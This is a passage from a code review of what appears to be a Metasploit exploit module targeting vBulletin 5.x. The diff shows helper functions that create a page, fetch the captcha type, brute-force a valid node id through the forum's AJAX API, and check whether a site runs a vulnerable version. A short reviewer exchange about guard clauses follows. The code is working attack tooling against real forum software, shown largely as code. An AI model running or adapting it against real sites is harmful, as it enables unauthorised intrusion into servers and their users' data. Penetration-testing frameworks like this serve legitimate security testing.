modules/exploits/multi/http/vbulletin_getindexablecontent.rb

```diff
@@ -0,0 +1,663 @@
+      }
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    parsed_resp = JSON.parse(res.body.to_s)
+
+    unless parsed_resp['success']
+      return nil
+    end
+
+    print_good("Page succesfully created and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.")
+
+    parsed_resp['pageid']
+  end
+
+  # Gets human verification type (options: "Question" | "Image" | Recaptcha2 | "Disabled")
+  def get_hv_type
+
+    print_status("Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvType' to get human verification type.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'hv', 'fetchHvType')
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    hv_type = res.body.to_s.tr('"', '')
+    print_good("Retrieved HV/captcha type of '#{hv_type}'.")
+
+    hv_type.to_s.tr("'", '')
+  end
+
+  # Brute force a nodeid (attack requires a valid nodeid)
+  def brute_force_node
+    min = datastore['MINNODE']
+    max = datastore['MAXNODE']
+
+    if min > max
+      print_error("MINNODE can't be major than MAXNODE.")
+      return nil
+    end
+
+    for node_id in min..max
+      if exists_node?(node_id)
+        return node_id
+      end
+    end
+
+    nil
+  end
+
+  # Checks if a nodeid is valid
+  def exists_node?(id)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'node', 'getNode'),
+      'vars_post' => {
+        'nodeid' => id.to_s
+      }
+    })
+
+    unless res && res.code == 200
+      return nil
+    end
+
+    parsed_resp = JSON.parse(res.body.to_s)
+
+    if parsed_resp['errors']
+      return false
+    end
+
+    print_good("Sucessfully found node at id #{id}")
+    true
+  end
+
+  # Gets a node through BF or user supplied value
+  def get_node
+    if datastore['NODE'].nil? || datastore['NODE'] <= 0
+      print_status('Brute forcing to find a valid node id.')
+      return brute_force_node
+    end
+
+    print_status("Checking node id '#{datastore['NODE']}'.")
+    if exists_node?(datastore['NODE'])
+      return datastore['NODE']
+    else
+      return nil
+    end
+  end
+
+  # Check function for exploit
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'js', 'login.js')
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /vBulletin 5\.6\.1 Patch Level 1/
+        return CheckCode::Safe
+      elsif res.body.to_s =~ /vBulletin ([\.0-9]+)/
+        if Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.6.1')
+          return CheckCode::Safe
+        elsif Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('5.0.0')
+          return CheckCode::Appears
+        else
+          return CheckCode::Detected
+        end
+      end
+    else
+      vprint_error('Connection failed')
+      return CheckCode::Unknown
+    end
```

Comment:
This could probably use guard clauses to unnest the logic.

Reply:
Cleaned up check logic (specifically with guard clauses). Thank you!